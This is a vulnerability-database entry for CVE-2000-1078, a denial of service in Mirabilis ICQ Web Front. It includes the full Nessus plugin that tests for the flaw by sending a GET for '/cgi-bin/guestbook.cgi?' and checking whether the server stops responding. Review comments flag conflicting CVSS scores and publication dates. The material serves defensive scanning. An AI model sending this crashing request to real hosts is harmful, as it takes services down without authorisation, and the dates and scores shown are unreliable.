Vulnerabilities > CVE-2000-1078 - Unspecified vulnerability in Mirabilis ICQ web Front Windows9X

CVSS 5.0 - MEDIUM
Attack vector: NETWORK
Attack complexity: LOW
Privileges required: NONE
Confidentiality impact: NONE
Integrity impact: NONE
Availability impact: PARTIAL
network
low complexity
mirabilis
nessus
exploit available

Summary

ICQ Web Front HTTPd allows remote attackers to cause a denial of service by requesting a URL that contains a "?" character.

Vulnerable Configurations

Part Description Count
Application
Mirabilis
1

Exploit-Db

description: Mirabilis ICQ 0.99/98.0 a/2000.0 A/99a Remote DoS Attack Vulnerability. CVE-2000-1078. DoS exploit for the cgi platform.
id: EDB-ID:20071
last seen: 2016-02-02
modified: 2000-03-10
published: 2000-03-10
reporter: Charles Chear
source: https://www.exploit-db.com/download/20071/
title: Mirabilis ICQ 0.99/98.0 a/2000.0 A/99a Remote DoS Attack Vulnerability

Nessus

NASL family: CGI abuses
NASL id: ICQ_CRASH.NASL
description: The remote web server appears to be the ICQ Web Front service for ICQ. An unauthenticated attacker can crash the version of ICQ Web Front installed on the remote host by connecting to it and sending a special request, '/cgi-bin/guestbook.cgi?'.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 10347
published: 2000-03-15
reporter: This script is Copyright (C) 2000-2018 Tenable Network Security, Inc.
source: https://www.tenable.com/plugins/nessus/10347
title: ICQ Web Front Service guestbook.cgi DoS
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

# Registration stanza: when the plugin is loaded with `description` set, it
# only records the metadata below and exits (see the exit(0) at the end of the
# block); nothing in this block contacts the target.
if (description)
{
 script_id(10347);
 script_version("1.31");
 script_cvs_date("Date: 2018/11/15 20:50:17");

 # Cross-references used to correlate this finding with other advisories.
 script_cve_id("CVE-2000-1078");
 script_bugtraq_id(1463);

 script_name(english:"ICQ Web Front Service guestbook.cgi DoS");
 script_summary(english:"ICQ denial of service");

 script_set_attribute(attribute:"synopsis", value:"The remote host is prone to a denial of service attack.");
 script_set_attribute(attribute:"description", value:
"The remote web server appears to be the ICQ Web Front service for ICQ.

An unauthenticated attacker can crash the version of ICQ Web Front
installed on the remote host by connecting to it and sending a special
request, '/cgi-bin/guestbook.cgi?'.");
 script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2000/Oct/123");
 # The only remediation given is to switch the embedded web server off; no
 # fixed version is named here.
 script_set_attribute(attribute:"solution", value:"Deactivate ICQ Web Front's web server service.");
 # NOTE(review): this vector rates the issue AC:H / A:C, which differs from the
 # CVSS 5.0 rating (low complexity, partial availability impact) listed for
 # CVE-2000-1078 -- confirm which score your reporting should use.
 script_set_cvss_base_vector("CVSS2#AV:N/AC:H/Au:N/C:N/I:N/A:C");
 script_set_cvss_temporal_vector("CVSS2#E:F/RL:U/RC:ND");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");

 # NOTE(review): the plugin publication date below precedes the vulnerability
 # publication date; one of the two is presumably inaccurate -- verify before
 # relying on either for timeline work.
 script_set_attribute(attribute:"vuln_publication_date", value:"2000/10/07");
 script_set_attribute(attribute:"plugin_publication_date", value:"2000/03/15");

 # Reported as a potential (not confirmed) vulnerability.
 script_set_attribute(attribute:"potential_vulnerability", value:"true");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();

 # ACT_DENIAL places this plugin in the denial-of-service category: it is an
 # intrusive check. Scan policies with safe checks enabled are expected to
 # skip it -- confirm against the policy in use before scanning production.
 script_category(ACT_DENIAL);

 script_copyright(english:"This script is Copyright (C) 2000-2018 Tenable Network Security, Inc.");
 script_family(english:"CGI abuses");

 # Scheduling constraints: runs after http_version.nasl, requires the
 # Settings/ParanoidReport key, and targets port 80 or any port registered
 # under Services/www.
 script_dependencies("http_version.nasl");
 script_require_keys("Settings/ParanoidReport");
 script_require_ports(80, "Services/www");

 exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

# The result below is inferred from the service going silent, not from a
# version or banner match, so the check only runs at paranoia level 2 or above.
if (report_paranoia < 2)
{
  audit(AUDIT_PARANOID);
}

port = get_http_port(default:80, embedded:1);

# Baseline: if the web server is already unresponsive there is nothing to
# measure, and a later "dead" reading could not be attributed to this check.
if (http_is_dead(port:port))
{
  exit(0);
}

# Intrusive step: the response itself is not inspected; only the liveness of
# the service afterwards matters.
res = http_send_recv3(method:"GET", item:"/cgi-bin/guestbook.cgi?", port:port);

# A finding means the service stopped answering after the request (re-checked
# with retry:3). Operators should expect the service to stay down until it is
# restarted -- presumably manually; confirm on the affected host.
if (http_is_dead(port:port, retry:3))
{
  security_warning(port);
}